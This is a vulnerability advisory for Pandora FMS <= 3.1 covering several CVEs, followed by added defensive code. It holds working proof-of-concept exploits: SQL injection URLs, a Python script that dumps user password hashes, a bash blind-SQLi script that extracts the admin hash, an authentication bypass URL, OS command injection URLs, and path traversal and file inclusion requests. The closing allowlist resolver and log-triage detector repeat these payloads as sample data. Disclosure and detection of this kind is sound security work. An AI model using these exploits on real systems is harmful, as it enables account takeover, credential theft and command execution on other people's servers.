Pandora FMS is server monitoring software. Pandora FMS <= 3.1 has multiple security vulnerabilities, including directory traversal, SQL injection, OS command injection and authentication bypass, among others, which expose affected installations to multiple security threats.
[+] Info:
~~~~~~~~~
Pandora FMS <= 3.1 SQL Injection
Pandora FMS <= 3.1 Authentication Bypass
Pandora FMS <= 3.1 OS Command Injection
Pandora FMS <= 3.1 Blind SQL Injection
Pandora FMS <= 3.1 Path Traversal and LFI
CVE-2010-4280
CVE-2010-4279
CVE-2010-4278
CVE-2010-4282
[+] Poc:
~~~~~~~~~
SQLi:
http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and password from the database
#
# configure cookie & host before use it
# usage
# python sqlinj_users.py
# admin:75b756ff2785ea8bb9ae02c13b6a71f1
# ...

import json
import urllib2

headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}

url = "http://HOST/pandora_console/ajax.php"
url += "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"
url += "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"

req = urllib2.Request(url, headers=headers)
resp = urllib2.urlopen(req)

# the injected UNION places id_user and password in the two columns that
# the page serialises as "id_agente" and "nombre"
users = json.loads(resp.read())
for user in users:
    print(user["id_agente"] + ":" + user["nombre"])
Authentication Bypass:
http://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1
OS Command Injection:
http://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;
http://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;
Blind SQL Injection:
http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,29%49%29=29%20and%20id_user=0x61646d696e%20%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%281
Exploit:

#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
# configure host, cookie & group_id before use it
# usage
# $ ./getpassword.sh
# 74b444ff2785ea8bb9ae02c13b6a71f1

HOST="HOST"
TARGET_USER="0x61646d696e" # admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2

j=1
while [ $j -lt 33 ]; do
  i=0
  while [ $i -lt ${#CHARSET[@]} ]; do
    # printf "'x" yields the ordinal of x, which is what ord() is compared against
    c=$(printf %d "'${CHARSET[$i]}")

    URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281"
    curl $URL --cookie "PHPSESSID=$COOKIE" 2>/dev/null | grep -q $PATTERN
    if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi
    let i++
  done
  if [ $i -eq ${#CHARSET[@]} ]; then echo "Something wrong!"; exit 1; fi
  let j++
done
echo
exit 0
Path Traversal and LFI:
5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local File Inclusion) - CVE-2010-4281 - CVE-2010-4282 - CVSS 8.5/10
The page parameter of ajax.php does not properly sanitize user-supplied input. The function safe_url_extraclean filters the : character and does not allow the string "http://" to be used to build URLs, but it does allow the / character, so an attacker could reference remote resources such as Windows UNC files using //servername//resource/file.
Note that the first check in safe_url_extraclean filters ://, so that filter can be bypassed easily with http://url, since it only strips the first protocol://. However, the last preg_replace strips the : character.
Proof of concept:
UNC: http://servername/pandora_console/ajax.php?page=//server/share/test
As well, ajax.php allows including any PHP file on the disk filesystem:
http://servername/pandora_console/ajax.php?page=../directory/file
The %00 character is not allowed due to the filtering in safe_url_extraclean, so it is not possible to include files other than PHP files, but the . and / characters are still allowed.
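The weakness described above is that safe_url_extraclean strips characters it dislikes instead of stating what it accepts, so "../" and "//server/share" survive. As an added example (not Pandora FMS code), resolve_page below applies an allowlist of path segments plus a realpath containment check to the same inputs; BASE_DIR is an assumed install path.

```python
# Allowlist resolution of an include-page parameter such as ajax.php's page=.
# Added example, not Pandora FMS code; BASE_DIR is an assumed install path.
import os
import re

BASE_DIR = '/var/www/pandora_console'  # assumed console directory
SEGMENT = re.compile(r'[A-Za-z0-9_]+')  # what one module-name segment may contain

def resolve_page(page, base_dir=BASE_DIR):
    """Return the absolute .php path for page, or None if it must be refused."""
    if not page or any(ord(c) < 0x20 for c in page):
        return None  # control characters (NUL included) are never valid
    parts = page.split('/')
    # Empty or dotted segments cover "../x", "/x", "//server/share" and "a//b"
    if any(p in ('', '.', '..') for p in parts):
        return None
    # Anything outside the allowlist (':', '\\', '%', spaces) is refused, not stripped
    if not all(SEGMENT.fullmatch(p) for p in parts):
        return None
    candidate = os.path.realpath(os.path.join(base_dir, page + '.php'))
    root = os.path.realpath(base_dir) + os.sep
    if not candidate.startswith(root):
        return None  # defence in depth: a symlink inside the tree cannot escape it
    return candidate
```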
5.2 - PHP File Inclusion (or RFI: Remote File Inclusion) - CVE-2010-4283 - CVSS 7.9/10
An attacker can inject arbitrary PHP code and execute it
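As an added example (not from the advisory or from Pandora FMS), the following script triages web-server access-log lines for the request shapes used by each vector on this page: non-numeric or comment-laden id_group/group_id values, loginhash_* parameters on index.php, shell metacharacters in the networkmap layout parameter, and page= values that leave the console tree or name a UNC path. The log lines are constructed.

```python
# Triage of Pandora FMS <= 3.1 exploitation attempts in web-server access logs.
# Added example, not from the advisory or Pandora FMS; the log lines are constructed.
import re
from urllib.parse import unquote_plus, urlsplit

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r'/\*.*?\*/|\b(union|select|substring)\b', re.I)
SHELL_META = re.compile(r'[;|`$&]')
TRAVERSAL = re.compile(r'\.\./|^//|://')

def indicators(line):
    """Return the advisory vectors (as tags) that one access-log line matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group('target'))
    if not url.path.startswith('/pandora_console/'):
        return []
    q = {}  # first value per parameter, percent-decoded so %29/%20 payloads are seen
    for pair in url.query.split('&'):
        key, _, value = pair.partition('=')
        q.setdefault(key.lower(), unquote_plus(value))
    tags = []
    for p in ('id_group', 'group_id'):  # group ids must be plain integers
        v = q.get(p, '')
        if v and (not v.isdigit() or SQL_TOKENS.search(v)):
            tags.append('sqli:' + p)
    if url.path.endswith('/index.php') and 'loginhash_data' in q and 'loginhash_user' in q:
        tags.append('auth-bypass:loginhash')  # login form skipped via loginhash
    if q.get('sec2') == 'operation/agentes/networkmap' and SHELL_META.search(q.get('layout', '')):
        tags.append('cmd-injection:layout')  # shell metacharacters reach the OS
    if TRAVERSAL.search(q.get('page', '')):
        tags.append('lfi:page')  # page= escapes the console tree or names a UNC path
    return tags

def triage(log_text):
    """List (client_ip, tags) for every suspicious line in a log."""
    return [(line.split(' ', 1)[0], indicators(line))
            for line in log_text.splitlines() if indicators(line)]

# Constructed sample log (combined format): one benign request, then one per vector.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2010:10:00:01 +0100] "GET /pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=2 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Dec/2010:10:00:02 +0100] "GET /pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario HTTP/1.1" 200 812
10.0.0.9 - - [07/Dec/2010:10:00:03 +0100] "GET /pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1 HTTP/1.1" 302 0
10.0.0.9 - - [07/Dec/2010:10:00:04 +0100] "GET /pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id; HTTP/1.1" 200 2201
10.0.0.9 - - [07/Dec/2010:10:00:05 +0100] "GET /pandora_console/ajax.php?page=../directory/file HTTP/1.1" 200 10
10.0.0.9 - - [07/Dec/2010:10:00:06 +0100] "GET /pandora_console/ajax.php?page=//server/share/test HTTP/1.1" 500 0
"""
```

Running triage(SAMPLE_LOG) flags the five requests from 10.0.0.9 and nothing for the benign group_id=2 request.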